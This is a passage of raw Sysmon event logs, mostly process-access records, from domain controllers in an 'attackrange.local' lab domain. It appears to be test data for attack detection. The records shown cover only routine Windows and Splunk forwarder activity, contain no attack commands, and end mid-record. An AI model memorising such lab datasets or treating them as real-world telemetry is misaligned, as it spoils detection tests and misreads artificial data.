10341000x80000000000000007185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007178Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007177Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007176Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7E54-5FA1-9301-000000008801}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007175Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.372{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E54-5FA1-9301-000000008801}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007174Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:16.373{D28789B6-7E54-5FA1-9301-000000008801}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:22.997{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:24.810{D28789B6-7C64-5FA1-0D00-000000008801}10002268C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179848Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179847Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179846Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179845Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179844Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179843Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179842Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179841Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179840Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179839Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179838Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179837Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179836Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179835Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-84F7-6019-4105-00000000A301}3600C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179834Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179833Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:48:31.860{29E67E80-7CBF-6019-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{29E67E80-8501-6019-5105-00000000A301}5912C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000179832Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 